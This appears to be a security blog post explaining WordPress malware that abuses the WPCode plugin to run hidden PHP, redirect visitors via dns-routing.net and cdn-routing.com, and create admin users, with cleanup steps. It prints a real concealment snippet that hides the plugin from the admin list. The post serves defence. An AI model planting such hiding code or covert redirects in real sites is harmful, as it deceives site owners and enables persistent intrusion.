This post covers a specific malware that targets WordPress sites through the WPCode (Headers and Footers) plugin. It redirects users to dns-routing.net and uses several techniques to avoid detection. We will walk through recognising the symptoms, understanding how it works, and removing it from your site.
Identifying the Malware
1. Recognizing the Symptoms
One of the initial signs of this malware is unusual behavior on your WordPress site, such as sporadic redirects. Users may be redirected to the dns-routing.net domain, followed by a seemingly random URL. These redirects are infrequent, making the issue more difficult to identify and diagnose.
2. Understanding the Malware's Mechanism
This malware combines several techniques, using the WPCode (Headers and Footers) plugin to carry out its malicious activities:
- Domain Routing and TXT Lookups: The malware directs traffic through dns-routing.net and utilizes cdn-routing.com to perform TXT lookups. These lookups return structured domains encoded in Base64. The malware then decodes these domains to determine where users should be redirected.
- Conditional Redirects: The malware strategically triggers redirects by checking conditions like IP address and device type (e.g., mobile or iPhone). It only activates redirects once every 24 hours per IP, reducing the likelihood of detection.
- Admin User Creation: The malware can create new admin users by embedding malicious code into the database. This technique bypasses typical filesystem checks and takes advantage of the WPCode plugin's ability to execute PHP code.
3. Hidden Plugins and Malicious Code
The attackers exploit the legitimate "WPCode" plugin to hide their tracks. They use this plugin to run PHP code while concealing it from the WP Admin > Plugins section, allowing the malware to persist undetected.
Here's an example of the malicious code:
add_filter('all_plugins', function($plugins) {
unset($plugins['insert-headers-and-footers/ihaf.php']);
return $plugins;
});This snippet demonstrates how the malware hides the WPCode plugin from view while maintaining control over the site by executing code stored in the database.
Cleaning Up the Malware
If you suspect this malware is on your site, follow these steps to remove it:
1. Rename the Plugin Folder
To prevent the malware from hiding the WPCode plugin, navigate to the wp-content/plugins directory via FTP or your hosting control panel and rename the insert-headers-and-footers folder to something like insert-headers-and-footers-2.
Note: Renaming the plugin folder will stop the malware from unsetting the plugin, allowing you to access it in the WP Admin panel.
2. Re-enable and Disable the Malicious Code
After renaming the folder, go to your WP Admin area and navigate to Code Snippets > Code Snippets. The previously hidden WPCode plugin should now be visible. Disable the active code snippet that the malware added.
3. Remove the Plugin
Once you've disabled the malicious code, delete the "Insert Headers and Footers" plugin from your WordPress site. This removes the vector the attackers used to maintain their presence.
4. Reset Admin Passwords and Review Users
Change all admin passwords to ensure the attackers can't regain access. Review your list of admin users and remove any accounts that appear suspicious or that you don't recognize.
5. Update Everything
Make sure all plugins, themes, and WordPress core files are up-to-date. Regular updates help close vulnerabilities that could be exploited by malware.
6. Final Checks
After completing these steps, conduct a thorough review of your site to ensure it's clean. Consider running a full site scan with a reputable security plugin that can also check your database.
Malware that exploits plugins like WPCode to redirect users to dns-routing.net and uses cdn-routing.com for domain routing is a serious threat. If you catch it early and clean up properly, you can get rid of it. Keep your site updated, use strong passwords, and review your admin accounts regularly. If you think your site has been compromised, follow the steps above to clean it up.